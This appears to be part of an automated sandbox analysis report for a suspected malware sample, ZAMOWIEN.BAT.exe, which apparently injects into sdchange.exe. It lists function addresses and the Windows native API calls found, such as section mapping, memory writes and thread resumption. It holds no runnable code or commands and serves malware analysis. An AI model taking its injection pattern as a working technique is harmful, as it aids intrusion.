Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2FB0 NtResumeThread,LdrInitializeThunk,	6_2_04FF2FB0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2F30 NtCreateSection,LdrInitializeThunk,	6_2_04FF2F30
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2AF0 NtWriteFile,LdrInitializeThunk,	6_2_04FF2AF0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2AD0 NtReadFile,LdrInitializeThunk,	6_2_04FF2AD0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_04FF2BF0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_04FF2BE0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_04FF2BA0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2B60 NtClose,LdrInitializeThunk,	6_2_04FF2B60
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF35C0 NtCreateMutant,LdrInitializeThunk,	6_2_04FF35C0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF39B0 NtGetContextThread,LdrInitializeThunk,	6_2_04FF39B0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2CF0 NtOpenProcess,	6_2_04FF2CF0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2CC0 NtQueryVirtualMemory,	6_2_04FF2CC0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2C00 NtQueryInformationProcess,	6_2_04FF2C00
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2DB0 NtEnumerateKey,	6_2_04FF2DB0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2D00 NtSetInformationFile,	6_2_04FF2D00
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2EA0 NtAdjustPrivilegesToken,	6_2_04FF2EA0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2E30 NtWriteVirtualMemory,	6_2_04FF2E30
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2FA0 NtQuerySection,	6_2_04FF2FA0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2F90 NtProtectVirtualMemory,	6_2_04FF2F90
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2F60 NtCreateProcessEx,	6_2_04FF2F60
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2AB0 NtWaitForSingleObject,	6_2_04FF2AB0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2B80 NtQueryInformationFile,	6_2_04FF2B80
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF3090 NtSetValueKey,	6_2_04FF3090
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF3010 NtOpenDirectoryObject,	6_2_04FF3010
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF3D70 NtOpenThread,	6_2_04FF3D70
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF3D10 NtOpenProcessToken,	6_2_04FF3D10
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030D9700 NtReadFile,	6_2_030D9700
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030D97F0 NtDeleteFile,	6_2_030D97F0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030D9590 NtCreateFile,	6_2_030D9590
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030D9A10 NtAllocateVirtualMemory,	6_2_030D9A10
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030D98A0 NtClose,	6_2_030D98A0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_052DF9B4 NtUnmapViewOfSection,NtClose,	6_2_052DF9B4

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

Code function: 0_2_0040364B EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040364B

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 0_2_6E351BFF	0_2_6E351BFF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328052A0	4_2_328052A0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281B2C0	4_2_3281B2C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A12ED	4_2_328A12ED
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281D2F0	4_2_3281D2F0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3284739A	4_2_3284739A
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327ED34C	4_2_327ED34C
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B132D	4_2_328B132D
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328070C0	4_2_328070C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AF0CC	4_2_328AF0CC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B70E9	4_2_328B70E9
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328BF0E0	4_2_328BF0E0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF172	4_2_327EF172
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3280B1B0	4_2_3280B1B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328CB16B	4_2_328CB16B
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3283516C	4_2_3283516C
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B16CC	4_2_328B16CC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32845630	4_2_32845630
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328BF7B0	4_2_328BF7B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F1460	4_2_327F1460
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328BF43F	4_2_328BF43F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289D5B0	4_2_3289D5B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C95C3	4_2_328C95C3
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B7571	4_2_328B7571
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32845AA0	4_2_32845AA0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289DAAC	4_2_3289DAAC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A1AA3	4_2_328A1AA3
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328ADAC6	4_2_328ADAC6
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328BFA49	4_2_328BFA49
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B7A46	4_2_328B7A46
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32873A6C	4_2_32873A6C
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281FB80	4_2_3281FB80
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32875BF0	4_2_32875BF0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3283DBF9	4_2_3283DBF9
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328BFB76	4_2_328BFB76
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328038E0	4_2_328038E0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3286D800	4_2_3286D800
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32895910	4_2_32895910
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32809950	4_2_32809950
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281B950	4_2_3281B950
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32809EB0	4_2_32809EB0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32801F92	4_2_32801F92
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328BFFB1	4_2_328BFFB1
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328BFF09	4_2_328BFF09
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327C3FD5	4_2_327C3FD5
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327C3FD2	4_2_327C3FD2
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328BFCF2	4_2_328BFCF2
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32879C32	4_2_32879C32
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281FDC0	4_2_3281FDC0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32803D40	4_2_32803D40
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B1D5A	4_2_328B1D5A
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B7D73	4_2_328B7D73
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328802C0	4_2_328802C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A0274	4_2_328A0274
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C03E6	4_2_328C03E6
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3280E3F0	4_2_3280E3F0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328BA352	4_2_328BA352
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32892000	4_2_32892000
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C01AA	4_2_328C01AA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B41A2	4_2_328B41A2
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B81CC	4_2_328B81CC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F0100	4_2_327F0100
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289A118	4_2_3289A118
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32888158	4_2_32888158
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281C6E0	4_2_3281C6E0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FC7C0	4_2_327FC7C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32824750	4_2_32824750
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32800770	4_2_32800770
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AE4F6	4_2_328AE4F6
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A4420	4_2_328A4420
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B2446	4_2_328B2446
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C0591	4_2_328C0591
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32800535	4_2_32800535
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FEA80	4_2_327FEA80
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B6BD7	4_2_328B6BD7
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328BAB40	4_2_328BAB40
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3282E8F0	4_2_3282E8F0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3280A840	4_2_3280A840
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32802840	4_2_32802840
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E68B8	4_2_327E68B8
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328029A0	4_2_328029A0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328CA9A6	4_2_328CA9A6
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32816962	4_2_32816962
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32812E90	4_2_32812E90
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328BCE93	4_2_328BCE93
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328BEEDB	4_2_328BEEDB
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328BEE26	4_2_328BEE26
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32800E59	4_2_32800E59
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287EFA0	4_2_3287EFA0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3280CFE0	4_2_3280CFE0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32842F28	4_2_32842F28
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32820F30	4_2_32820F30
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F2FC8	4_2_327F2FC8
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A2F30	4_2_328A2F30
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32874F40	4_2_32874F40
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A0CB5	4_2_328A0CB5
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32800C00	4_2_32800C00
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F0CF2	4_2_327F0CF2
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32818DBF	4_2_32818DBF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3280AD00	4_2_3280AD00
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289CD1F	4_2_3289CD1F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FADE0	4_2_327FADE0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05080591	6_2_05080591
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05064420	6_2_05064420
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05072446	6_2_05072446
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FC0535	6_2_04FC0535
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0506E4F6	6_2_0506E4F6
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FDC6E0	6_2_04FDC6E0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FBC7C0	6_2_04FBC7C0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FC0770	6_2_04FC0770
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FE4750	6_2_04FE4750
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0505A118	6_2_0505A118
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05048158	6_2_05048158
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_050801AA	6_2_050801AA
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_050741A2	6_2_050741A2
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_050781CC	6_2_050781CC
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05052000	6_2_05052000
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FB0100	6_2_04FB0100
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0507A352	6_2_0507A352
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_050803E6	6_2_050803E6
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FCE3F0	6_2_04FCE3F0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05060274	6_2_05060274
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_050402C0	6_2_050402C0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FB0CF2	6_2_04FB0CF2
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0505CD1F	6_2_0505CD1F
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FC0C00	6_2_04FC0C00
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FBADE0	6_2_04FBADE0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FD8DBF	6_2_04FD8DBF
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05060CB5	6_2_05060CB5
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FCAD00	6_2_04FCAD00
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05002F28	6_2_05002F28
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05062F30	6_2_05062F30
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05034F40	6_2_05034F40
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FD2E90	6_2_04FD2E90
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0503EFA0	6_2_0503EFA0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FC0E59	6_2_04FC0E59
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0507EE26	6_2_0507EE26
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FB2FC8	6_2_04FB2FC8
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0507CE93	6_2_0507CE93
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FE0F30	6_2_04FE0F30
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0507EEDB	6_2_0507EEDB
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FEE8F0	6_2_04FEE8F0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FA68B8	6_2_04FA68B8
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0508A9A6	6_2_0508A9A6
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FCA840	6_2_04FCA840
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FC2840	6_2_04FC2840
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FC29A0	6_2_04FC29A0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FD6962	6_2_04FD6962
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0507AB40	6_2_0507AB40
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FBEA80	6_2_04FBEA80
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05076BD7	6_2_05076BD7
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05077571	6_2_05077571
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FB1460	6_2_04FB1460
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0505D5B0	6_2_0505D5B0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_050895C3	6_2_050895C3
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0507F43F	6_2_0507F43F
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0507F7B0	6_2_0507F7B0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05005630	6_2_05005630
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_050716CC	6_2_050716CC
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FC70C0	6_2_04FC70C0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0508B16B	6_2_0508B16B
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FCB1B0	6_2_04FCB1B0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FAF172	6_2_04FAF172
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF516C	6_2_04FF516C
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0506F0CC	6_2_0506F0CC
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0507F0E0	6_2_0507F0E0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_050770E9	6_2_050770E9
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FDD2F0	6_2_04FDD2F0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0507132D	6_2_0507132D
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FDB2C0	6_2_04FDB2C0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FC52A0	6_2_04FC52A0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0500739A	6_2_0500739A
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FAD34C	6_2_04FAD34C
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_050612ED	6_2_050612ED
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05071D5A	6_2_05071D5A
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05077D73	6_2_05077D73
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05039C32	6_2_05039C32
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FDFDC0	6_2_04FDFDC0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FC3D40	6_2_04FC3D40
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0507FCF2	6_2_0507FCF2
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0507FF09	6_2_0507FF09
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FC9EB0	6_2_04FC9EB0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0507FFB1	6_2_0507FFB1
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04F83FD2	6_2_04F83FD2
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04F83FD5	6_2_04F83FD5
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FC1F92	6_2_04FC1F92
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05055910	6_2_05055910
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FC38E0	6_2_04FC38E0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0502D800	6_2_0502D800
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FC9950	6_2_04FC9950
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FDB950	6_2_04FDB950
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0507FB76	6_2_0507FB76
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05035BF0	6_2_05035BF0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FFDBF9	6_2_04FFDBF9
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05077A46	6_2_05077A46
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0507FA49	6_2_0507FA49
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05033A6C	6_2_05033A6C
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FDFB80	6_2_04FDFB80
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05005AA0	6_2_05005AA0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_05061AA3	6_2_05061AA3
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0505DAAC	6_2_0505DAAC
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_0506DAC6	6_2_0506DAC6
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030C2080	6_2_030C2080
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030BCF3A	6_2_030BCF3A
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030BCF40	6_2_030BCF40
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030B13A1	6_2_030B13A1
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030BB29F	6_2_030BB29F
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030BB2A0	6_2_030BB2A0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030BB150	6_2_030BB150
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030BD160	6_2_030BD160
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030C5740	6_2_030C5740
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030C3940	6_2_030C3940
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030C3942	6_2_030C3942
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030C38F9	6_2_030C38F9
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030DBEB0	6_2_030DBEB0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_052DE444	6_2_052DE444
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_052DE7E0	6_2_052DE7E0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_052DE325	6_2_052DE325
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_052DD8A8	6_2_052DD8A8
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_052DCB33	6_2_052DCB33

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: String function: 32847E54 appears 108 times
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: String function: 3286EA12 appears 82 times
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: String function: 327EB970 appears 262 times
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: String function: 32835130 appears 58 times
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: String function: 3287F290 appears 103 times
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: String function: 0503F290 appears 103 times
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: String function: 0502EA12 appears 86 times
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: String function: 04FAB970 appears 262 times
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: String function: 05007E54 appears 107 times
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: String function: 04FF5130 appears 58 times

Source: ZAMOWIEN.BAT.exe, 00000004.00000003.2329811647.0000000032590000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ZAMOWIEN.BAT.exe
